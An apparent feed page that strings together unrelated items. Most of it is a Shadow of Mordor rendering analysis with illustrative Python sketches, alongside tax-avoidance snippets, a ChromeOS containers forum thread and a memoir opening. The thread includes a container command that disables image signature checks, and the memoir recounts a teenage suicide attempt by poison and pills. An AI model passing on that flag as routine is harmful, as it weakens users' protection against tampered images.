Ireland's decision to phase out the Double Irish tax loophole doesn't mean the country is giving up on tax competition, or that U.S. multinationals will now bring more of their foreign earnings home. The reason affected tech companies are so calm about it is that they know Ireland will do whatever it takes to keep them. And it's not just Ireland ...

"Revelations of the extent of tax avoidance by multinationals based on exploitation of the arm’s length system prompted a rear-guard action by the OECD described as the base erosion and profit shifting (BEPS) programme but the programme deliberately avoids any principled re-examination of norms underlying the international tax regime or any consideration of a shift from residence to source-based taxation."

And the icing on the cake: we will present the Stakhanov of Capitalism, the only employee of ExxonMobil Spain (on a mere 55,000 euro annual salary): 9.9 billion euros in net profits in two years.


The Rendering of Middle Earth: Shadow of Mordor

$
0
0

Middle Earth: Shadow of Mordor was released in 2014. The game itself was a great surprise, and the fact that it was a spin-off within the storyline of the Lord of the Rings universe was quite unusual and it’s something I enjoyed. The game was a great success, and at the time of writing, Monolith has already released the sequel, Shadow of War. The game’s graphics are beautiful, especially considering it was a cross-generation game and was also released on Xbox 360 and PS3. The PC version is quite polished and features a few extra graphical options and hi-resolution texture packs that make it shine.

The game uses a relatively modern deferred DX11 renderer. I used Renderdoc to delve into the game’s rendering techniques. I used the highest possible graphical settings (ultra) and enabled all the bells and whistles like order-independent transparency, tessellation, screen-space occlusion and the different motion blurs.

This is the frame we’ll be analyzing. We’re at the top of a wooden scaffolding in the Udun region. Shadow of Mordor has similar mechanics to games like Assassin’s Creed where you can climb buildings and towers and enjoy some beautiful digital scenery from them.

Depth Prepass

The first ~140 draw calls perform a quick prepass to render the biggest elements of the terrain and buildings into the depth buffer. Most things don’t end up appearing in this prepass, but it helps when you’ve got a very large number of draw calls and a long view distance. Interestingly, the character, who is always in front and takes up a decent amount of screen space, does not go into the prepass. As is common for many open world games, the game employs reverse z, a technique that maps the near plane to 1.0 and the far plane to 0.0 for increased precision at great distances and to prevent z-fighting. You can read more about z-buffer precision here.
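
To make the precision argument concrete, here is a small numpy sketch (my own illustration, not the game's code) comparing what float32 can distinguish under a conventional depth mapping versus a reversed one; the near and far values are made up.

import numpy as np

# Hypothetical near/far planes; the point is only the float32 behaviour.
near, far = 0.1, 10000.0

def standard_z(view_z):
    # conventional mapping: near -> 0.0, far -> 1.0 (hyperbolic, post-projection)
    return (far / (far - near)) * (1.0 - near / view_z)

def reverse_z(view_z):
    # reversed mapping: near -> 1.0, far -> 0.0
    return 1.0 - standard_z(view_z)

# Two distant surfaces half a unit apart. float32 has far more representable
# values near 0.0 than near 1.0, so reverse z keeps them distinct.
a, b = 5000.0, 5000.5
assert np.float32(standard_z(a)) == np.float32(standard_z(b))   # z-fighting
assert np.float32(reverse_z(a)) != np.float32(reverse_z(b))     # still distinct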

G-buffer

Right after that, the G-Buffer pass begins, with around ~2700 draw calls. If you’ve read my previous analysis of Castlevania: Lords of Shadow 2 or other similar articles, you’ll be familiar with this pass. Surface properties are written to a set of buffers that are read later on by the lighting passes to compute each surface’s response to light. Shadow of Mordor uses a classical deferred renderer, but gets by with a comparatively small number of G-buffer render targets (three). Just for comparison, Unreal Engine uses between 5 and 6 buffers in this pass. The G-buffer layout is as follows:

Normals Buffer
R = Normal.x | G = Normal.y | B = Normal.z | A = ID

The normals buffer stores the normals in world space, in an 8-bit per channel format. This is a little bit tight, sometimes not enough to accurately represent smoothly varying flat surfaces, as can be seen in some puddles throughout the game if you pay close attention. The alpha channel is used as an ID that marks different types of objects. Some IDs I’ve found: characters (255), animated plants or flags (128), and the sky (1), which is later used to filter the sky out during the bloom phase (it gets its own radial bloom).

Albedo Buffer
R = Albedo.r | G = Albedo.g | B = Albedo.b | A = Cavity Occlusion

The albedo buffer stores all three albedo components and a small scale occlusion (sometimes called cavity occlusion) that is used to darken small details that no shadow mapping or screen space post effect could really achieve. It’s mainly used for decorative purposes, such as the crevices and wrinkles in clothes, small cracks in wood, the tiny patterns in Talion’s clothes, etc.

The albedo receives special treatment from a blood texture in the shader in the case of enemies (interestingly, Talion never receives any visible wounds). The blood texture is an input to this stage when rendering enemies’ clothes and bodies, but it doesn’t specify the color of the blood, which comes from a constant buffer; instead it specifies blood multipliers/levels that control how much blood shows through. The normal orientation is also used to scale the effect, controlling the directionality of the blood splatter. The albedo then effectively gets tinted by the intensity of the wounds the enemy has received, at the locations marked by the blood map, while other surface properties like specular are also modified to get a convincing blood effect. I haven’t been able to find the part of the frame where the blood map gets rendered, but I presume it’s written right at the beginning of the frame, when the sword impact takes place, and then used here.

Specular Buffer
R = Roughness | G = Specular Intensity | B = Fresnel | A = Subsurface Scattering Factor

The specular buffer contains other surface properties you’d expect from many games: roughness (it’s not really roughness but a scaled specular exponent, though it can be interpreted as such), a specular intensity which scales the albedo to get an appropriate specular color, a reflectivity factor (typically called F0 in graphics literature, as it’s the input to the Fresnel specular response), and a subsurface scattering component. This last component is used to light translucent materials such as thin fabric, plants, and skin. If we delve into the lighting shader later on, we find that a variation of the normalized Blinn-Phong specular model is in use here.
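
As a rough illustration of the layout above, here is a small Python sketch that packs the same properties into three RGBA8 targets. The function and parameter names are mine, not the game's; it mostly shows where the 8-bit normal quantization mentioned earlier comes from.

import numpy as np

def pack_gbuffer(normal, obj_id, albedo, cavity, roughness, spec_intensity, f0, sss):
    # Target 0: world-space normal remapped from [-1, 1] to [0, 255], plus object ID.
    normals_rt = np.array([*np.round((np.asarray(normal) * 0.5 + 0.5) * 255), obj_id], dtype=np.uint8)
    # Target 1: albedo plus small-scale (cavity) occlusion.
    albedo_rt = np.array([*np.round(np.asarray(albedo) * 255), round(cavity * 255)], dtype=np.uint8)
    # Target 2: roughness, specular intensity, F0 and subsurface scattering factor.
    specular_rt = np.array([round(c * 255) for c in (roughness, spec_intensity, f0, sss)], dtype=np.uint8)
    return normals_rt, albedo_rt, specular_rt

def unpack_normal(normals_rt):
    return normals_rt[:3].astype(np.float32) / 255.0 * 2.0 - 1.0

n = np.array([0.0, 0.7071, 0.7071])
normals_rt, _, _ = pack_gbuffer(n, obj_id=255, albedo=np.array([0.5, 0.3, 0.2]), cavity=1.0,
                                roughness=0.6, spec_intensity=0.4, f0=0.04, sss=0.0)
print(unpack_normal(normals_rt) - n)   # quantization error on the order of 1/255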

Deferred Decals

As we’ve already seen, Shadow of Mordor goes to great lengths to show blood splatters on damaged characters. The environment also gets its own coating of dark orc blood as Talion swings his sword. However for the surroundings a different technique, deferred decals, is used. This technique consists of projecting a set of flat textures onto the surface of whatever has been rendered before, thereby replacing the contents of the G-Buffer with this new content before the lighting pass takes place. For blood a simple blood splatter does the trick, and by rendering many in sequence one can quickly create a pretty grim landscape.

The last thing that gets rendered in the G-buffer pass is the sky, a very high-resolution (8192×2048) sky texture in HDR BC6H format. I’ve had to tonemap it a bit because in HDR all the colors are too dark.

Tessellation

A very interesting feature of the game (if enabled) is tessellation. It’s used for many different things, from terrain to character rendering (character props and objects also use it). Tessellation here doesn’t subdivide a low-res mesh, but actually creates polygons from a point cloud, with as much subdivision as necessary depending on level of detail criteria like distance to the camera. An interesting example here is Talion’s cape, which is sent to the GPU as a point cloud (after the physics simulation) and the tessellation shader reconstructs the polygons.

Order-Independent Transparency

One of the first things that struck me as odd was the hair pass, as it runs a very complicated special shader. The graphics options mention an OIT option for the hair so this must be it. It first outputs to a separate buffer and counts the total number of overlapping transparent pixels while at the same time storing the properties in a “deep” Gbuffer-like structure. Later on, a different shader properly sorts the individual fragments according to their depth. Arrows seem to be rendered using this as well (I guess those feathers in the back need proper sorting too). It’s a subtle effect and doesn’t add a lot of visual difference but it’s a nice addition nonetheless. As a simple example here’s an image showing the overlapping fragment count (redder is more fragments). Regular transparency is still depth sorted in the CPU and rendered like traditional alpha. Only very specific items get into the OIT pass.
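
A toy sketch of that resolve step: gather every transparent fragment that lands on a pixel, then sort by depth and composite back to front. The data and names are purely illustrative.

# Unordered fragments written for one pixel by the hair shader: (depth, rgb, alpha).
fragments = [
    (0.32, (0.8, 0.7, 0.6), 0.5),
    (0.18, (0.2, 0.2, 0.2), 0.6),
    (0.25, (0.6, 0.5, 0.4), 0.4),
]

def resolve(fragments, background):
    color = list(background)
    # Sort far-to-near (larger depth = farther in this toy) and blend over the background.
    for depth, rgb, alpha in sorted(fragments, reverse=True):
        color = [alpha * src + (1.0 - alpha) * dst for src, dst in zip(rgb, color)]
    return color

print(len(fragments), "overlapping fragments ->", resolve(fragments, (0.1, 0.1, 0.3)))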

Shadows of Mordor

There are many sources of shadow in SoM. Aside from traditional shadow maps for the dynamic lights, SoM uses a two-channel screen-space ambient occlusion, micro-scale occlusion supplied for nearly all objects in the game, and a top-down heightmap-like occlusion texture.

Screen-space occlusion

The first pass renders screen-space ambient and specular occlusion using the gbuffer. The shader itself is a massive unrolled loop that samples both the full-size depth map and a previously downsampled averaged depth map looking for neighboring samples in a predefined pattern. It uses a square 4×4 texture to select pseudorandom vectors looking for occluders. It renders a noisy occlusion buffer, which is then smoothed via a simple two-pass blur. The most interesting feature here is that there are two different occlusion channels, one of them applied as specular occlusion, the other as diffuse. Typical SSAO implementations compute a single channel that applies to all baked lighting. Here the SSAO map is also read in the directional light pass and applied there.
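
The gist of the pass in a deliberately crude numpy sketch, illustrative only: the real shader works on view-space depth, uses the 4×4 noise texture, and weights diffuse and specular occlusion separately, but the core idea is counting nearby samples that sit closer to the camera.

import numpy as np

def screen_space_occlusion(depth, radius=3, samples=8, seed=0):
    rng = np.random.default_rng(seed)
    h, w = depth.shape
    occluders = np.zeros((h, w), dtype=np.float32)
    # Pseudorandom 2D offsets stand in for the noise-texture-driven sample pattern.
    offsets = rng.integers(-radius, radius + 1, size=(samples, 2))
    for dy, dx in offsets:
        neighbour = np.roll(depth, shift=(dy, dx), axis=(0, 1))
        occluders += (neighbour < depth - 0.01)       # neighbour closer to the camera
    ao = 1.0 - occluders / samples                    # 1 = open, 0 = heavily occluded
    return np.stack([ao, ao])                         # diffuse and specular channels

depth = np.ones((8, 8), dtype=np.float32)
depth[2:6, 2:6] = 0.5                                 # a box closer to the camera
print(screen_space_occlusion(depth)[0].round(2))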

Shadow Maps

The next event is shadow map rendering. Because it’s a mainly outdoors game, most of the lighting and shadows come from a main directional light. The technique in use here is Cascaded Shadow Maps (a variation of which is Parallel Split Shadow Maps), a fairly standard long-distance shadowing technique which consists of rendering the same scene from the point of view of the light for different regions of space. Shadow maps further away from the camera normally span a larger distance or are lower resolution than the previous ones, effectively trading away resolution in regions where the detail isn’t needed anyway because the geometry is far away. In this scene the game is rendering three 4096×4096 shadow cascades (the game actually has space for four), the top cascade being very close to Talion, while the bottom cascade includes mountains and objects far away from the camera. The game’s shadows also use the same reverse z trick as the depth map.

Shadow Buffer

The next step is to create a shadowing buffer. This is a 1-channel texture that encodes a [0, 1] shadowing factor based on the occlusion information from the previous shadow maps. To create a bit of softness around the edges, the shadow map is sampled 4 times with a special bilinear sampler state which takes 4 samples and compares each against a given value (this is called Percentage Closer Filtering). Taking several samples and averaging their results is often called Percentage Closer Soft Shadows. In addition to reading from the shadow map, the specular buffer’s last component is also sampled (recall that this is a subsurface scattering factor) and multiplied by a “light bleed factor”, which seems to attempt to remove shadowing from these objects to let a bit more light through.
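
Spelled out as a sketch (a hardware comparison sampler does all of this in a single fetch; the function name and the reverse-z comparison are assumptions on my part):

import numpy as np

def pcf_shadow(shadow_map, u, v, receiver_depth):
    # Four neighbouring shadow-map texels, each compared against the receiver's
    # depth, then blended with bilinear weights: the result is a soft 0..1 factor.
    h, w = shadow_map.shape
    x, y = u * (w - 1), v * (h - 1)
    x0, y0 = int(np.floor(x)), int(np.floor(y))
    fx, fy = x - x0, y - y0
    lit = 0.0
    for dx, dy, weight in [(0, 0, (1 - fx) * (1 - fy)), (1, 0, fx * (1 - fy)),
                           (0, 1, (1 - fx) * fy),       (1, 1, fx * fy)]:
        occluder = shadow_map[min(y0 + dy, h - 1), min(x0 + dx, w - 1)]
        # With reverse z, a larger stored depth means a closer occluder.
        lit += weight * float(receiver_depth >= occluder)
    return lit   # 0 = fully shadowed, 1 = fully lit

shadow_map = np.full((4, 4), 0.2, dtype=np.float32)
shadow_map[:, 2:] = 0.9                       # something close to the light on the right
print(pcf_shadow(shadow_map, u=0.5, v=0.5, receiver_depth=0.4))   # 0.5, a soft edge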

Directional Projection Texture

Another source of light and shadow is a top-down texture that is sampled by the directional light. It’s a color tint to the main directional light’s color plus a global shadowing term that is applied to the directional lighting. Some of it seems to have been hand-authored on top of an automatically-generated image of the level. The slideshow below shows the color tint, the occlusion, and the product of both factors which gives an idea of what the final color mask looks like.

The result of all the light passes gets saved into an R11G11B10F render target. This is roughly what the result looks like. I tonemapped the results to make the influence of the directional light on the level much more evident.

All the faraway mountains (not shown in the above image) also get lit by directional lights but they’re special cased to be able to control the lighting better. Some are at scale but the ones further away are actually flat textures (impostors) with cleverly authored normal and albedo maps. They have special directional lights affecting just the mountains.

Static Lighting

Shadow of Mordor uses a very memory-intensive static lighting solution that involves some very big volume textures. The images below represent the three static light volume textures used for the diffuse lighting of a part of this area. They are each a whopping 512x512x128 BC6H compressed texture, which is to say 256MB per texture or 768MB total (we are playing on high quality settings after all). The Color texture represents the irradiance incoming to a voxel. The other two represent the strength of that irradiance along the six +xyz and -xyz directions, with the normal serving as a way to select three components (positive or negative xyz, the ones most aligned with the normal). Once we’ve constructed this vector, we take the dot product of it and the squared normal, and this becomes the scale factor for the irradiance. As a formula, this looks like the following:

normalSquared = normal \cdot abs(normal)

staticVolumeVector.c = \begin{cases} staticVolumePositive.c, & \text{if } normalSquared.c \geq 0 \\ staticVolumeNegative.c, & \text{otherwise} \end{cases} \quad \text{where } c \in \{x, y, z\}

staticVolumeLighting = dot(staticVolumeVector, normalSquared) \cdot ambientOcclusionDiffuse \cdot staticVolumeColor
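
The same math in a short Python transcription (variable names are mine; in the game this happens in the lighting shader):

import numpy as np

def static_volume_lighting(normal, volume_color, volume_positive, volume_negative, ao_diffuse):
    normal_squared = normal * np.abs(normal)
    # Per component, pick the +xyz or -xyz irradiance strength the normal points toward.
    volume_vector = np.where(normal_squared >= 0.0, volume_positive, volume_negative)
    return np.dot(volume_vector, normal_squared) * ao_diffuse * volume_color

normal = np.array([0.0, 1.0, 0.0])            # a surface facing straight up
color = np.array([1.0, 0.9, 0.8])             # irradiance sampled from the Color volume
positive = np.array([0.2, 0.7, 0.3])          # strengths along +x, +y, +z
negative = np.array([0.1, 0.1, 0.1])          # strengths along -x, -y, -z
print(static_volume_lighting(normal, color, positive, negative, ao_diffuse=1.0))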

 

Images: Static Light Volume Color, Static Light Volume Negative Direction, Static Light Volume Positive Direction.

Static Light Volumes also render a cubemap for the specular lighting, which was probably captured at the center of the SLV. Interestingly enough, while the volume textures store HDR values compressed in BC6H, cubemaps are stored in BC3 format (aka DXT5), which cannot store floating-point values. To compensate for this limitation, the alpha channel stores an intensity that is later scaled to a range of 1 to 10. It’s a bit of an odd decision and to me it looks more like legacy. Remember this game was also released on the previous generation, which doesn’t support newer HDR texture formats.
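
The decode implied by that trick might look something like this (the exact remap from alpha to the 1-to-10 scale is my assumption):

def decode_ldr_cubemap_texel(r, g, b, a):
    # BC3 stores LDR rgb plus an alpha channel; alpha is reinterpreted as an
    # intensity multiplier, remapped here from [0, 1] to [1, 10] (assumed remap).
    intensity = 1.0 + a * 9.0
    return (r * intensity, g * intensity, b * intensity)

print(decode_ldr_cubemap_texel(0.5, 0.4, 0.3, 1.0))   # a bright HDR highlight: (5.0, 4.0, 3.0)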

 

The following sequence shows the before and after, with the actual contribution in the middle image. They have been tonemapped for visualization.

Atmospheric Fog

Shadow of Mordor has a weather and time-of-day system that’ll take Mordor from sunny skies to murky rains as you progress through the game. A number of components drive this system, fog being one of the most prominent. Shadow of Mordor uses a fairly simple but physically-grounded atmospheric fog model, including a single-scattering simulation of Rayleigh and Mie scattering.

It starts off by computing the position of the camera from the center of Earth. A few trigonometric calculations end up determining where within the atmosphere the camera is, where the pixel is, and how much of the atmosphere the ray has traveled given a maximum atmospheric height. In this case the atmospheric height is set to 65000 meters above the planet surface. With this information the Rayleigh and Mie coefficients are used to compute both types of fog particle densities and colors. These densities occlude the already shaded pixels by dispersing the light incoming to the camera from the shaded surface and add the contribution of the fog. The radiance and direction of the sun is taken into account to simulate this scattering.

Exposure and Tonemapping

Exposure takes on the fairly typical approach of successively downsampling a luminance buffer computed from the main HDR color buffer into a chain of textures, each of which is half the size of the previous texture, starting off with a texture that is 1/3rd of the main framebuffer. This downsampling takes 4 samples that average the neighboring pixels, so after collapsing all the averages into a single texel, the final result is the average luminance. After the texture reaches 16×9 texels, a compute shader is dispatched that adds up all the remaining texels. This value is immediately read in the tonemapping pass to adjust the luminance values.
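
The arithmetic of that chain, sketched in numpy (the real work happens in downsampling pixel shaders plus the final compute shader; padding at odd sizes is my own simplification):

import numpy as np

def average_luminance(luminance):
    # Repeatedly average 2x2 blocks until a single value, the mean scene luminance, is left.
    while luminance.size > 1:
        h, w = luminance.shape
        if h % 2:                      # pad odd dimensions by repeating the edge
            luminance = np.vstack([luminance, luminance[-1:]])
        if w % 2:
            luminance = np.hstack([luminance, luminance[:, -1:]])
        luminance = 0.25 * (luminance[0::2, 0::2] + luminance[1::2, 0::2] +
                            luminance[0::2, 1::2] + luminance[1::2, 1::2])
    return luminance.item()

hdr_luma = np.random.default_rng(1).random((90, 160)).astype(np.float32)
print(average_luminance(hdr_luma), float(hdr_luma.mean()))   # nearly identical values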

Tonemapping uses a variation of the Reinhard operator whose optimized formula can be found here and here.
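
The game’s shader is HLSL; as a stand-in, here is a Python sketch of one widely used “optimized” curve, the Hejl/Burgess-Dawson filmic approximation, which matches the behaviour described in the next paragraph. Whether it is the exact formula the game uses is an assumption.

import numpy as np

def filmic_tonemap(hdr_color):
    # Hejl/Burgess-Dawson style curve (assumed stand-in for the game's operator).
    # The small 0.004 offset clips the bottom of the range to black, and the
    # rational curve approaches 1.0 only asymptotically.
    x = np.maximum(0.0, hdr_color - 0.004)
    return (x * (6.2 * x + 0.5)) / (x * (6.2 * x + 1.7) + 0.06)

print(filmic_tonemap(np.array([0.0, 0.003, 0.5, 1.0, 2.0])))
# An input of 2.0 maps to roughly 0.91, i.e. about 10% of the white range is given up.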

If we plot this curve we can see that this operator pretty much discards 10% of the whites even at an input value of 2.0, while forcing a small part of the bottom range fully to black. This creates a desaturated, dark look.

Alpha Stage

The alpha stage is a bit unusual, as it renders objects directly into the LDR buffer. Other games render them into the HDR buffer as well so they can participate in the exposure pass. In any case, the previously computed luminance texture is bound to all the alpha-lit objects (in some cases, like emissive objects, the exposure is performed via shader constants rather than a texture lookup), and therefore exposure is automatically applied when drawing instead of as a post process. A very particular case of alpha is the game’s specter mode (a mode where the spirit of Celebrimbor, who forges the rings of power in the LOTR universe, is rendered on top of you as a means to show that he is always present, although invisible). The game passes a few parameters into both character meshes which control the opacity and allow the game to partially occlude Talion and gradually reveal Celebrimbor. Other objects in the game also render ghost versions on top of the opaque object in specter mode, such as enemies and towers. Here is a different scene midway through the transition to the spectral world.

Rain

The main capture we’ve been looking at doesn’t show rain but weather is such an important part of the game I wanted to mention it here. It is generated and simulated in the GPU, and gets rendered right at the end of the alpha stage. A compute shader is dispatched that runs the simulation and writes positions to a buffer. These positions get picked up by another shader that renders as many instances of quads as positions were computed in the previous pass via an instanced indirect call. The vertex shader has a simple quad that gets deformed and oriented towards the camera as necessary. To avoid rain leaking through surfaces, the vertex shader also reads a top-down height map that allows it to discard any drops below an occluding surface. This height map is rendered right at the beginning of the frame. The same vertex shader tells the pixel shader where to sample from a raindrop texture; if the drop is close to a surface it selects a region of the texture that has a splash animation instead. Raindrops also run the fog computation in the pixel shader to blend seamlessly with the rest of the scene. Here’s a screenshot from the same point of view on a rainy day.

While the rain effect is active, the specular buffer is modified globally to produce wet surfaces, and rain waves are rendered into the normals buffer. The animation is tileable so only a single frame of the looping animation is used. The following normals buffer has been modified in order to see the ripples rendered into the buffer.

Lens Flares and Bloom

After all alpha has been rendered, lens flares get rendered on top. A series of offset quads are rendered starting at the point where the directional light is coming from (the sun in this case). Immediately after, the bloom pass is performed. This is a fairly standard technique, which consists of a series of downscaled and blurred textures that contain pixels whose luminance is above a certain threshold. There are two bloom passes, a general Gaussian blurred one for the scene and a special radial blur that only applies to the sky. The radial blur is one use of the special ID stored in the normals G-Buffer, since only pixels from the sky are taken into account. As a bonus, this blur samples the depth map and is able to produce some inexpensive godrays. Because the buffer we’re working with at this stage is LDR, the bloom threshold isn’t what you’d expect from an HDR pipeline (values above a threshold, typically 1.0, trigger bloom), which means the amount of bloom you can get from it is a bit limited. It works for the game in any case and here are the results. In the images below the bloom mip colors look weird because every pixel is scaled by the luminance contained in the alpha channel. This luminance had been previously computed in the tonemapping pass. In the final composite the bloom is calculated as bloom.rgb · bloom.a · bloomScale.

AA + Depth of Field

There isn’t much to say about these two as they’re relatively industry standard: a simple FXAA antialiasing pass is run right after bloom is composited onto the LDR image, and depth of field is performed immediately after. For the depth of field the game renders two downscaled, blurred versions of the final buffer. Pixel depth is then used to blend between the blurred image and the sharp one, giving out-of-focus areas their unfocused appearance. I have exaggerated the depth of field in this capture for visualization purposes. The game has an in-game screenshot mode that allows you to very easily tweak these settings.
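
The blend itself is easy to sketch (the focus-depth and focus-range parameterization is mine, not the game’s):

import numpy as np

def depth_of_field(sharp, blurred, depth, focus_depth, focus_range):
    # sharp/blurred: HxWx3 images, depth: HxW. Blur amount is 0 at the focal
    # depth and reaches 1 once a pixel is a full focus_range away from it.
    blur_amount = np.clip(np.abs(depth - focus_depth) / focus_range, 0.0, 1.0)
    return sharp * (1.0 - blur_amount[..., None]) + blurred * blur_amount[..., None]

sharp = np.zeros((2, 2, 3)); blurred = np.ones((2, 2, 3))
depth = np.array([[10.0, 11.0], [20.0, 40.0]])
print(depth_of_field(sharp, blurred, depth, focus_depth=10.0, focus_range=20.0)[..., 0])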

Motion Blur

Motion blur consists of two passes. First, a fullscreen velocity buffer is populated from the camera’s previous and current orientation, filling the first two channels of the texture with a screen-space velocity. The r channel is how much a pixel has changed in the horizontal dimension of the screen, g channel for the vertical. That’s how you get radial streaks as you move the camera around. The characters are rendered again, this time populating the blue channel as well, using their current and previous poses just like with the camera. The blue channel is used to mark whether a character was rendered or not. The alpha channel is also populated with a constant value (0.0598) but I didn’t really investigate too much what it means or its purpose. The velocity buffer is then downsampled into a very small texture, by averaging a relatively wide neighborhood of velocities in the original texture. This will give each pixel in the final pass a rough idea of how wide the blur radius is going to be in the actual blur pass.

The blur pass then reads both velocity textures, the depth map, the original color buffer, and a noise texture; the last one is there to hide the mirror-image effect that can occur when doing this kind of blur with a large radius. The image buffer is then sampled several times in the direction the velocity buffer points, averaging the colors, which ends up blurring the image in the direction of the motion vectors. The effect is also scaled by the frame rate the game is running at. For this capture, I had to cap the game at 30fps, as the effect was barely noticeable at 60fps+.
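
A rough sketch of that final gather, with velocities in pixels and the noise jitter omitted (everything here is illustrative):

import numpy as np

def motion_blur(image, velocity, taps=9):
    # March along each pixel's velocity vector and average the colours picked up.
    h, w, _ = image.shape
    ys, xs = np.mgrid[0:h, 0:w]
    out = np.zeros_like(image)
    for i in range(taps):
        t = i / (taps - 1) - 0.5                 # centred samples along the streak
        sy = np.clip(np.round(ys + velocity[..., 1] * t).astype(int), 0, h - 1)
        sx = np.clip(np.round(xs + velocity[..., 0] * t).astype(int), 0, w - 1)
        out += image[sy, sx]
    return out / taps

image = np.zeros((4, 64, 3), dtype=np.float32)
image[:, 32] = 1.0                               # a bright vertical line
velocity = np.zeros((4, 64, 2), dtype=np.float32)
velocity[..., 0] = 12.0                          # camera panning horizontally
blurred = motion_blur(image, velocity)
print(np.count_nonzero(blurred[0, :, 0]), "columns of row 0 are now lit")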

Color Correction

A final color correction pass is performed using “color cubes”. A color cube is a 3D texture whose rgb components map to the xyz coordinates of the texture. These xyz coordinates contain a color, the color we are going to replace the original color with. In this case the LUT was the neutral one (i.e. the coordinate and the color it contains are the same value) so I’ve modified the same scene with some of the different presets the game comes with in the camera editor.
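
The lookup itself is only a few lines (nearest-neighbour here instead of the trilinear filtering a real shader gets for free; the “warm” grade is an invented example):

import numpy as np

def make_neutral_lut(size=16):
    # A neutral colour cube: the colour stored at (r, g, b) is (r, g, b) itself.
    axis = np.linspace(0.0, 1.0, size)
    r, g, b = np.meshgrid(axis, axis, axis, indexing="ij")
    return np.stack([r, g, b], axis=-1)

def apply_lut(rgb, lut):
    size = lut.shape[0]
    idx = np.clip(np.round(np.asarray(rgb) * (size - 1)).astype(int), 0, size - 1)
    return lut[idx[0], idx[1], idx[2]]

lut = make_neutral_lut()
lut[..., 2] *= 0.8                                   # crude grade: pull the blue channel down
print(apply_lut((0.25, 0.5, 0.75), lut))             # blue comes back noticeably reduced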

Final Frame

After the main frame has finished, the UI is rendered onto a separate buffer. This guarantees that no matter the resolution you have chosen for the backbuffer in the game, the UI will always render crisp and nice into the native window size, while the game can vary its resolution if needed for performance. At the end, both textures are blended together based on the UI’s alpha channel and rendered into the final framebuffer, ready to be displayed.

I hope you’ve enjoyed reading this analysis, comments or doubts are welcome. I would like to thank Adrian Courrèges for his amazing work which has inspired this graphics study, and the team at Monolith for this truly memorable game.

ChromeOS: How VM and Containers will seem to run

$
0
0

Very interesting, great writeup! As someone who does fulltime development on a Pixel 2 with Crouton, I would love love love first class support that allows me to get my unix toolchain running without devmode.

Same, I've been developing in a chroagh chroot, but that project is abandoned.

If I can start running docker containers on my Chromebook that would be a significant change to my current workflow.

I'd buy a new Pixelbook and throw this Surface Pro 4 under a bus.

So in layman's terms, does this mean that at some time in the future we'll be able to launch a VM of a Linux instance and run Linux programs through that without having to jump through a ton of hoops?

Yes. Pretty much.

What would be really interesting would be if this could extend to windows vms too.

Good writeup :) Although vmc will only be used for untrusted/non-official containers. The Google-signed containers use a different command.

There are still parts not merged even into master, so I would wait a little longer before trying to play with these, but good things are coming to those who can wait :)

But I can't wait! :-P

Are the Google containers actually signed, or are they assumed safe because of their location? I'm asking because I'm ready to try my hand at making a custom container, placing it in /opt/google/containers and using the dbus message to get them going.

Were you able to run containers with vmc now that the Pixelbook is out?

I don't have a Pixelbook. You can read a bit of update on my progress here but still no.

I was gutted none of this was mentioned in the event yesterday. It's such a game changer, it makes me think it could be further away than I expected to not get any mention. What do people think, early next year maybe?

Yeah same. I'd be really happy to just have a replacement for crouton/just have linux containers at first, but maybe they're just waiting to release everything at once.

This might make me keep one of my pixel 2 LS. The other is still for sale.

What are you listing it for? I have one and have been considering selling it too

[deleted]

If you're in the market, why not just wait for the Pixelbook? Does the LS have something the Pixelbook doesn't?

$900

One thing I still have not been able to determine is if people think this functionality will be limited to linux programs. Do the commits suggest that google will be bringing windows containers and VMs? Easily the #1 thing I am missing on my chromebook is office, and no I don't want to spend $100 a year (office 365) for something I get from my work for free (Office 2016).

If you put your chromebook in dev mode, you can install the MS office android suite.

In the case of Windows it could not be a container under ChromeOS, since it's an entirely different operating system/kernel. Android x86/Ubuntu/etc could run in containers since it can use the main ChromeOS Linux kernel.

Thanks. I've had a rough time trying to understand exactly what the heck containers are vs VMs, but that makes sense.

The way I look at it is this: VMs virtualize physical hardware (so unique kernel and drivers in memory each simultaneous execution), while containers virtualize the operating system running under a core kernel (so kernel and drivers need only be loaded once), so that's why VMs incur more overhead but have more abilities as a result.

That's how I look at it too.

So containers would just run the user space right?

As the main post suggests, untrusted containers are run within virtual machines. Windows can run in a VM just fine.

I'm not really familiar with containers or VMs or docker, but after reading this post I did a search for a few of the programs I use in crouton "[program name] docker" and each of them had results show up as "Public | Automated Build" on the Docker site.

Does this mean if I get Eve, I could somehow run these? And without being in Dev mode?

It's all speculation right now but the correct answer is "maybe".

We're largely at the mercy of Google for what functionality they actually enable, which is not the same as what functionality they could enable. For instance, they could put in a 100% compatible Docker environment, but then limit you to a custom repository.

Similarly, they could say that only Device X gets container Y, or even container functionality at all, like they did with Android compatibility.

Ultimately, the fact that a function exists within ChromeOS does not imply that it's being enabled for direct user consumption. They could just as easily use this as better separation between Android app processes.


Really does not have to be that difficult. You can run Docker containers with just a regular Intel Chromebook and Crouton.

Install iptables

sudo apt install iptables libnfnetlink0

then

sudo rkt run --net=host docker://redis --insecure-options=image

rkt supports Docker containers from the Docker repository.

The Loneliness of the Long Distance Rocker

$
0
0

When I was fourteen years old I wanted to die. I felt doomed to be alone. My prospects for meaningful connection with other humans seemed bleak. I wasn’t consciously aware of my desire to end my life until one evening a switch flipped and I was done with this bullshit world. I drank poison and ate pills and spent the night in the hospital, surviving by the narrowest of margins. When I emerged into consciousness, waking up to my second act, I was singing a song. My delivery was mumbling and incoherent, to be sure, but it was a song nonetheless, specific and discrete.

From that point on, everything else, everything that wasn’t music, sloughed off. My dedication to my schoolwork disappeared as well as my athletic ambition, but so did my determination to end my own life. Writing songs was my way out, or rather back in—the act of creation made meaning where there had been none. And best of all, music brought with it a heretofore secret world of generous like-minded people who had also found meaning in the simple act of turning silence into songs.

I appeared in school talent shows to begin with, then I played between local bands at the clubs in the bohemian music district of Dallas known as Deep Ellum. All the while I was singing and strumming in parks and bedrooms and backyards. I engaged in good-natured arguments with fellow musicians over the meanings of songs, the hierarchies of greatest albums, and the elusive chords from our favorite tunes. In those pre-internet days we had to learn songs by ear, stopping and starting thinly stretched Maxell cassettes as we puzzled over the muddy transition from an A minor to an F.

The people in my local music scene were classmates, girlfriends, and older kids who’d attained a level of cool that didn’t even seem possible; and weirder still, they were all my friends. This world was dirty, impoverished, and occasionally dangerous but it was never lonely. You might not dig his or her music, but it was pretty rare to dislike a fellow musician.

